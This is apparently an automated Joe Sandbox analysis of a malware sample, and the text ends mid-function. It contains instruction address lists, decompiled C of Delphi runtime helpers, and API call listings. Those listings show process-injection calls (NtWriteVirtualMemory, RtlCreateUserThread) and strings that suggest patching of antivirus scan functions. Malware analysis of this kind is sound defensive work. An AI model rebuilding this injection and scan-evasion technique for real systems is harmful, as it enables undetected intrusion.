                                                                                                  0x02868f0c
                                                                                                  0x02868f11
                                                                                                  0x02868f13
                                                                                                  0x02868f23
                                                                                                  0x02868f3b
                                                                                                  0x02868f46
                                                                                                  0x02868f54
                                                                                                  0x02868f6c
                                                                                                  0x02868f77
                                                                                                  0x02868f78
                                                                                                  0x02868f7d
                                                                                                  0x02868f82
                                                                                                  0x02868f84
                                                                                                  0x02868f94
                                                                                                  0x02868fac
                                                                                                  0x02868fb7
                                                                                                  0x02868fc5
                                                                                                  0x02868fdd
                                                                                                  0x02868fe8
                                                                                                  0x02868fe9
                                                                                                  0x02868ffe
                                                                                                  0x02869004
                                                                                                  0x02869009
                                                                                                  0x0286900e
                                                                                                  0x02869010
                                                                                                  0x02869020
                                                                                                  0x02869038
                                                                                                  0x02869043
                                                                                                  0x02869051
                                                                                                  0x02869069
                                                                                                  0x02869074
                                                                                                  0x02869075
                                                                                                  0x0286907a
                                                                                                  0x0286907f
                                                                                                  0x02869081
                                                                                                  0x02869091
                                                                                                  0x028690a9
                                                                                                  0x028690b4
                                                                                                  0x028690c2
                                                                                                  0x028690da
                                                                                                  0x028690e5
                                                                                                  0x028690e6
                                                                                                  0x028690eb
                                                                                                  0x028690f0
                                                                                                  0x028690f2
                                                                                                  0x02869102
                                                                                                  0x0286911a
                                                                                                  0x02869125
                                                                                                  0x02869133
                                                                                                  0x0286914b
                                                                                                  0x02869156
                                                                                                  0x02869157
                                                                                                  0x02869168
                                                                                                  0x0286916d
                                                                                                  0x02869172
                                                                                                  0x02869174
                                                                                                  0x02869184
                                                                                                  0x0286919c
                                                                                                  0x028691a7
                                                                                                  0x028691b5
                                                                                                  0x028691cd
                                                                                                  0x028691d8
                                                                                                  0x028691d9
                                                                                                  0x028691de
                                                                                                  0x028691e3
                                                                                                  0x028691e5
                                                                                                  0x028691f5
                                                                                                  0x0286920d
                                                                                                  0x02869218
                                                                                                  0x02869226
                                                                                                  0x0286923e
                                                                                                  0x02869249
                                                                                                  0x0286924a
                                                                                                  0x0286924f
                                                                                                  0x02869254
                                                                                                  0x02869256
                                                                                                  0x02869266
                                                                                                  0x0286927e
                                                                                                  0x02869289
                                                                                                  0x02869297
                                                                                                  0x028692af
                                                                                                  0x028692ba
                                                                                                  0x028692bb
                                                                                                  0x028692d0
                                                                                                  0x028692d5
                                                                                                  0x028692db
                                                                                                  0x028692dd
                                                                                                  0x028692e2
                                                                                                  0x028692e4
                                                                                                  0x028692f4
                                                                                                  0x0286930c
                                                                                                  0x02869317
                                                                                                  0x02869325
                                                                                                  0x0286933d
                                                                                                  0x02869348
                                                                                                  0x02869349
                                                                                                  0x0286934e
                                                                                                  0x02869353
                                                                                                  0x02869355
                                                                                                  0x02869365
                                                                                                  0x0286937d
                                                                                                  0x02869388
                                                                                                  0x02869396
                                                                                                  0x028693ae
                                                                                                  0x028693b9
                                                                                                  0x028693ba
                                                                                                  0x028693bf
                                                                                                  0x028693c4
                                                                                                  0x028693c6
                                                                                                  0x028693d6
                                                                                                  0x028693ee
                                                                                                  0x028693f9
                                                                                                  0x02869407
                                                                                                  0x0286941f
                                                                                                  0x0286942a
                                                                                                  0x0286942b
                                                                                                  0x02869430
                                                                                                  0x02869436
                                                                                                  0x0286943c
                                                                                                  0x02869442
                                                                                                  0x02869448
                                                                                                  0x0286944e
                                                                                                  0x02869455
                                                                                                  0x02869457
                                                                                                  0x0286945c
                                                                                                  0x0286945e
                                                                                                  0x0286946e
                                                                                                  0x02869486
                                                                                                  0x02869491
                                                                                                  0x0286949f
                                                                                                  0x028694b7
                                                                                                  0x028694c2
                                                                                                  0x028694c3
                                                                                                  0x028694d8
                                                                                                  0x028694dd
                                                                                                  0x028694e3
                                                                                                  0x028694e7
                                                                                                  0x028694ee
                                                                                                  0x028694f3
                                                                                                  0x028694f8
                                                                                                  0x028694fa
                                                                                                  0x0286950a
                                                                                                  0x02869522
                                                                                                  0x0286952d
                                                                                                  0x0286953b
                                                                                                  0x02869553
                                                                                                  0x0286955e
                                                                                                  0x0286955f
                                                                                                  0x02869564
                                                                                                  0x02869569
                                                                                                  0x0286956b
                                                                                                  0x0286957b
                                                                                                  0x02869593
                                                                                                  0x0286959e
                                                                                                  0x028695ac
                                                                                                  0x028695c4
                                                                                                  0x028695cf
                                                                                                  0x028695d0
                                                                                                  0x028695d5
                                                                                                  0x028695da
                                                                                                  0x028695dc
                                                                                                  0x028695ec
                                                                                                  0x02869604
                                                                                                  0x0286960f
                                                                                                  0x0286961d
                                                                                                  0x02869635
                                                                                                  0x02869640
                                                                                                  0x02869641
                                                                                                  0x02869646
                                                                                                  0x0286964b
                                                                                                  0x0286964d
                                                                                                  0x0286965d
                                                                                                  0x02869675
                                                                                                  0x02869680
                                                                                                  0x0286968e
                                                                                                  0x028696a6
                                                                                                  0x028696b1
                                                                                                  0x028696b2

                                                                                                  APIs
                                                                                                    • Part of subcall function 02867B80: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02867C5B), ref: 02867BB8
                                                                                                    • Part of subcall function 02867B80: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BC6
                                                                                                    • Part of subcall function 02867B80: GetProcAddress.KERNEL32(6CFE0000,00000000), ref: 02867BDF
                                                                                                    • Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BFA
                                                                                                    • Part of subcall function 02867B80: VirtualProtectEx.KERNEL32(00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867C00
                                                                                                    • Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02867C2A
                                                                                                    • Part of subcall function 02867B80: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000), ref: 02867C30
                                                                                                    • Part of subcall function 02867B80: FreeLibrary.KERNEL32(6CFE0000,00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000), ref: 02867C3B
                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,ScanBuffer,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,ScanString,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,Initialize,028A63CC), ref: 028685FF
                                                                                                  • GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,NtOpenProcess,ScanBuffer,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,ScanString,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,Initialize), ref: 02868605
                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 02868871
                                                                                                    • Part of subcall function 028679CC: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028679D9
                                                                                                    • Part of subcall function 028679CC: GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028679DF
                                                                                                    • Part of subcall function 028679CC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028679FF
                                                                                                  • IsBadReadPtr.KERNEL32(00000000,00000040,?,?,00000000,00000000), ref: 02868A0A
                                                                                                  • IsBadReadPtr.KERNEL32(?,000000F8,00000000,00000040,?,?,00000000,00000000), ref: 02868A37
                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,?,000000F8,00000000,00000040,?,?,00000000,00000000), ref: 02868A87
                                                                                                  • RtlMoveMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,OpenSession,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,ScanBuffer,028A63CC,028699BC,OpenSession,028A63CC,028699BC,UacInitialize), ref: 02868DA2
                                                                                                  • RtlMoveMemory.C:\WINDOWS\SYSTEM32\NTDLL(?,?,?,00000000,00000000,00000000,OpenSession,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,ScanBuffer,028A63CC,028699BC,OpenSession), ref: 02868DDC
                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,028A63CC,028699BC,ScanBuffer,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,OpenSession,028A63CC,028699BC,UacInitialize,028A63CC), ref: 028692CA
                                                                                                  • GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,028A63CC,028699BC,ScanBuffer,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,OpenSession,028A63CC,028699BC,UacInitialize), ref: 028692D0
                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,RtlCreateUserThread,ScanBuffer,028A63CC,028699BC,?,?,00000000,00000000), ref: 028694D2
                                                                                                  • GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,RtlCreateUserThread,ScanBuffer,028A63CC,028699BC,?,?,00000000,00000000), ref: 028694D8
                                                                                                    • Part of subcall function 02867B24: LoadLibraryA.KERNEL32(ntdll), ref: 02867B36
                                                                                                    • Part of subcall function 02867B24: GetProcAddress.KERNEL32(00000000,NtOpenProcess), ref: 02867B43
                                                                                                    • Part of subcall function 02867B24: WriteProcessMemory.KERNEL32(00000000,00000000,?,00000001,?,00000000,NtOpenProcess,ntdll), ref: 02867B5C
                                                                                                    • Part of subcall function 02867B24: FreeLibrary.KERNEL32(00000000,00000000,NtOpenProcess,ntdll), ref: 02867B6F
                                                                                                  • CloseHandle.KERNEL32(00000000,ScanBuffer,028A63CC,028699BC,?,?,00000000,00000000), ref: 028697A7
                                                                                                  • NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,OpenSession,028A63CC,028699BC,ScanString,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,OpenSession,028A63CC,028699BC), ref: 0286991B
                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,00000000,00000000), ref: 02869931
                                                                                                  • NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,00000000,00000000), ref: 02869937
                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0286994E
                                                                                                  • NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,?,?,00000000,00000000), ref: 02869954
                                                                                                  • CloseHandle.KERNEL32(00000000,ScanString,028A63CC,028699BC,Initialize,028A63CC,028699BC,OpenSession,028A63CC,028699BC,ScanString,028A63CC,028699BC,Initialize,028A63CC,028699BC), ref: 0286995F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Memory$HandleProcess$AddressCurrentProcVirtual$FreeModule$Library$CloseLoadMoveReadWrite$AllocateProtect
                                                                                                  • String ID: C:\Windows\System32\ntdll.dll$Initialize$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$RtlCreateUserThread$ScanBuffer$ScanString$UacInitialize$UacScan$ntdll
                                                                                                  • API String ID: 1580181482-772507044
                                                                                                  • Opcode ID: 49283f6f5bb153f9ecb816b415f36f7ef6c570b1ea523ef3e28c5e2b83d8c818
                                                                                                  • Instruction ID: 774852005e44bb940c0fd1d92d9f94d885c183360bbfbdaebb4364035eff7268
                                                                                                  • Opcode Fuzzy Hash: 49283f6f5bb153f9ecb816b415f36f7ef6c570b1ea523ef3e28c5e2b83d8c818
                                                                                                  • Instruction Fuzzy Hash: 9DC21C3CA001689BEF10EB68D885BEE73F7AF45701F5081A1E505EB354EA74AE85CF52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 83%
                                                                                                  			E028558CC(CHAR* __eax, int __edx) {
                                                                                                  				CHAR* _v8;
                                                                                                  				int _v12;
                                                                                                  				CHAR* _v16;
                                                                                                  				void* _v20;
                                                                                                  				struct _WIN32_FIND_DATAA _v338;
                                                                                                  				char _v599;
                                                                                                  				void* _t102;
                                                                                                  				intOrPtr* _t103;
                                                                                                  				CHAR* _t106;
                                                                                                  				CHAR* _t108;
                                                                                                  				char* _t109;
                                                                                                  				void* _t110;
                                                                                                  
                                                                                                  				_v12 = __edx;
                                                                                                  				_v8 = __eax;
                                                                                                  				_v16 = _v8;
                                                                                                  				_v20 = GetModuleHandleA("kernel32.dll");
                                                                                                  				if(_v20 == 0) {
                                                                                                  					L4:
                                                                                                  					if( *_v8 != 0x5c) {
                                                                                                  						_t108 =  &(_v8[2]);
                                                                                                  						goto L10;
                                                                                                  					} else {
                                                                                                  						if(_v8[1] == 0x5c) {
                                                                                                  							_t109 = E028558AC( &(_v8[2]));
                                                                                                  							if( *_t109 != 0) {
                                                                                                  								_t17 = _t109 + 1; // 0x1
                                                                                                  								_t108 = E028558AC(_t17);
                                                                                                  								if( *_t108 != 0) {
                                                                                                  									L10:
                                                                                                  									_t102 = _t108 - _v8;
                                                                                                  									lstrcpynA( &_v599, _v8, _t102 + 1);
                                                                                                  									while( *_t108 != 0) {
                                                                                                  										_t106 = E028558AC( &(_t108[1]));
                                                                                                  										if(_t106 - _t108 + _t102 + 1 <= 0x105) {
                                                                                                  											lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1);
                                                                                                  											_v20 = FindFirstFileA( &_v599,  &_v338);
                                                                                                  											if(_v20 != 0xffffffff) {
                                                                                                  												FindClose(_v20);
                                                                                                  												if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) {
                                                                                                  													 *((char*)(_t110 + _t102 - 0x253)) = 0x5c;
                                                                                                  													lstrcpynA( &(( &(( &_v599)[_t102]))[1]),  &(_v338.cFileName), 0x105 - _t102 - 1);
                                                                                                  													_t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1;
                                                                                                  													_t108 = _t106;
                                                                                                  													continue;
                                                                                                  												}
                                                                                                  											}
                                                                                                  										}
                                                                                                  										goto L17;
                                                                                                  									}
                                                                                                  									lstrcpynA(_v8,  &_v599, _v12);
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_t103 = GetProcAddress(_v20, "GetLongPathNameA");
                                                                                                  					if(_t103 == 0) {
                                                                                                  						goto L4;
                                                                                                  					} else {
                                                                                                  						_push(0x105);
                                                                                                  						_push( &_v599);
                                                                                                  						_push(_v8);
                                                                                                  						if( *_t103() == 0) {
                                                                                                  							goto L4;
                                                                                                  						} else {
                                                                                                  							lstrcpynA(_v8,  &_v599, _v12);
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				L17:
                                                                                                  				return _v16;
                                                                                                  			}
















                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,02856BF8,02850000,02877790), ref: 028558E9
                                                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02855900
                                                                                                  • lstrcpynA.KERNEL32(?,?,?), ref: 02855930
                                                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02856BF8,02850000,02877790), ref: 02855994
                                                                                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02856BF8,02850000,02877790), ref: 028559CA
                                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02856BF8,02850000,02877790), ref: 028559DD
                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02856BF8,02850000,02877790), ref: 028559EF
                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02856BF8,02850000,02877790), ref: 028559FB
                                                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02856BF8,02850000), ref: 02855A2F
                                                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02856BF8), ref: 02855A3B
                                                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02855A5D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                  • API String ID: 3245196872-1565342463
                                                                                                  • Opcode ID: e5f99ec7f4a350e505283ac55ad621177557b3697b84d7a25cc0e1b7136184c6
                                                                                                  • Instruction ID: a2941bb751e62fbd720afd3cb41bab40b695b4033e63a9014a870c03eb7a219b
                                                                                                  • Opcode Fuzzy Hash: e5f99ec7f4a350e505283ac55ad621177557b3697b84d7a25cc0e1b7136184c6
                                                                                                  • Instruction Fuzzy Hash: 5B41807ED00228AFDB11DAE8CC88BDEB7BDAF08354F4845A5A949D7240E7389B448F51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E02855B9C() {
                                                                                                  				void* _t32;
                                                                                                  				CHAR* _t56;
                                                                                                  				CHAR* _t57;
                                                                                                  				struct HINSTANCE__* _t64;
                                                                                                  				void* _t66;
                                                                                                  
                                                                                                  				lstrcpynA(_t66 - 0x11d,  *(_t66 - 4), 0x105);
                                                                                                  				GetLocaleInfoA(GetThreadLocale(), 3, _t66 - 0xd, 5);
                                                                                                  				_t64 = 0;
                                                                                                  				if( *(_t66 - 0x11d) == 0 ||  *(_t66 - 0xd) == 0 &&  *(_t66 - 0x12) == 0) {
                                                                                                  					L14:
                                                                                                  					return _t64;
                                                                                                  				} else {
                                                                                                  					_t56 =  &((_t66 - 0x11d)[lstrlenA(_t66 - 0x11d)]);
                                                                                                  					L5:
                                                                                                  					if( *_t56 != 0x2e && _t56 != _t66 - 0x11d) {
                                                                                                  						_t56 = _t56 - 1;
                                                                                                  						goto L5;
                                                                                                  					}
                                                                                                  					_t32 = _t66 - 0x11d;
                                                                                                  					if(_t56 != _t32) {
                                                                                                  						_t57 =  &(_t56[1]);
                                                                                                  						if( *(_t66 - 0x12) != 0) {
                                                                                                  							lstrcpynA(_t57, _t66 - 0x12, 0x105 - _t57 - _t32);
                                                                                                  							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
                                                                                                  						}
                                                                                                  						if(_t64 == 0 &&  *(_t66 - 0xd) != 0) {
                                                                                                  							lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
                                                                                                  							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
                                                                                                  							if(_t64 == 0) {
                                                                                                  								 *((char*)(_t66 - 0xb)) = 0;
                                                                                                  								lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
                                                                                                  								_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  					goto L14;
                                                                                                  				}
                                                                                                  			}









                                                                                                  APIs
                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02855BAC
                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02855BB9
                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02855BBF
                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02855BEA
                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02855C31
                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02855C41
                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02855C69
                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02855C79
                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02855C9F
                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02855CAF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                  • API String ID: 1599918012-2375825460
                                                                                                  • Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                  • Instruction ID: 9cc0bd4f92caf1d1a21c259adafbcb172a45b5ebf1f24c25a93a05a087384f50
                                                                                                  • Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                  • Instruction Fuzzy Hash: 8B3187BDE4013C6AFB25D6B8DC49FDE77AD4B04384F8401E19A48E6181EB789F848F52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $c
                                                                                                  • API String ID: 0-3797896886
                                                                                                  • Opcode ID: 7e70446f2f04736b70a214ab031c3aa6bebdc213c1cd19f391bef6f9c6eef634
                                                                                                  • Instruction ID: 4eb901d307a1bcefe150c5f3661a6dfd4a00b885d09085293c89feaf717c02c5
                                                                                                  • Opcode Fuzzy Hash: 7e70446f2f04736b70a214ab031c3aa6bebdc213c1cd19f391bef6f9c6eef634
                                                                                                  • Instruction Fuzzy Hash: 1923F17DA00206AFDB31EF68CD84FBE77B2AF45704F188558E509E6281DB749981CF26
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E02857FB8(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                  				long _v8;
                                                                                                  				long _v12;
                                                                                                  				long _v16;
                                                                                                  				long _v20;
                                                                                                  				intOrPtr _v24;
                                                                                                  				signed int _v28;
                                                                                                  				CHAR* _t25;
                                                                                                  				int _t26;
                                                                                                  				intOrPtr _t31;
                                                                                                  				intOrPtr _t34;
                                                                                                  				intOrPtr* _t37;
                                                                                                  				intOrPtr* _t38;
                                                                                                  				intOrPtr _t46;
                                                                                                  				intOrPtr _t48;
                                                                                                  
                                                                                                  				_t25 = _a4;
                                                                                                  				if(_t25 == 0) {
                                                                                                  					_t25 = 0;
                                                                                                  				}
                                                                                                  				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                                                                  				_v28 = _v8 * _v12;
                                                                                                  				_v24 = 0;
                                                                                                  				_t46 = _v24;
                                                                                                  				_t31 = E0285539C(_v28, _t46, _v16, 0);
                                                                                                  				_t37 = _a8;
                                                                                                  				 *_t37 = _t31;
                                                                                                  				 *((intOrPtr*)(_t37 + 4)) = _t46;
                                                                                                  				_t48 = _v24;
                                                                                                  				_t34 = E0285539C(_v28, _t48, _v20, 0);
                                                                                                  				_t38 = _a12;
                                                                                                  				 *_t38 = _t34;
                                                                                                  				 *((intOrPtr*)(_t38 + 4)) = _t48;
                                                                                                  				return _t26;
                                                                                                  			}


















                                                                                                  APIs
                                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02857FD9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DiskFreeSpace
                                                                                                  • String ID:
                                                                                                  • API String ID: 1705453755-0
                                                                                                  • Opcode ID: d558045882f34555589acd1f43931dcce1d214f025d2185a02bd3273f9f057ba
                                                                                                  • Instruction ID: 7e984dc68e14ae03a3ea730d280a03b3cb9f1e6aaa304536754b6fa9d8a0d3eb
                                                                                                  • Opcode Fuzzy Hash: d558045882f34555589acd1f43931dcce1d214f025d2185a02bd3273f9f057ba
                                                                                                  • Instruction Fuzzy Hash: 4C11D2B5E00209AFDB44CF99C881DEFF7FAEFC8300B54C559A909E7254E6719A018B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0285A7A8(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                                                                  				char _v260;
                                                                                                  				int _t5;
                                                                                                  				intOrPtr _t10;
                                                                                                  				void* _t18;
                                                                                                  
                                                                                                  				_t18 = __ecx;
                                                                                                  				_t10 = _a4;
                                                                                                  				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
                                                                                                  				_t19 = _t5;
                                                                                                  				if(_t5 <= 0) {
